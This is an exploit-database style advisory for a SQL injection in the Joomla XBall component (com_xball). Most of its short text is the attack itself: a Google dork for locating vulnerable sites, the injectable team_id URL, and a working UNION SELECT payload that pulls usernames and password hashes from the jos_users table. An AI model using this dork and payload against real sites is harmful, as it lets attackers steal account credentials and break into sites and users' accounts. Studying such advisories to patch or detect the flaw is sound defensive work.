The Joomla XBall component suffers from a remote SQL injection vulnerability.
3c4cfbbf448868e11e4357c2448bfff1df9c025aedfda21fd7837d2179f9ca48
######################################################################################################
# Exploit Title : Joomla Component (com_xball) SQL Injection Vulnerability
#
# Author : CoBRa_21
#
# E-Mail : uyku_cu [at] windowslive.com
#
# My Team : Lojistik ALLSTAR (cyber-warrior.org)
#
# Google Dork : inurl:index.php?option=com_xball
#
# Status : High-Risk
######################################################################################################
#
# SQL Vulnerability
#
# https://127.0.0.1/[PATH]/index.php?option=com_xball&controller=teams&task=show&team_id=-98 (SQL)
#
# SQL EXPLOIT
#
# +union+select+0,1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users
#
######################################################################################################
# ( Vulnerability Researcher )
######################################################################################################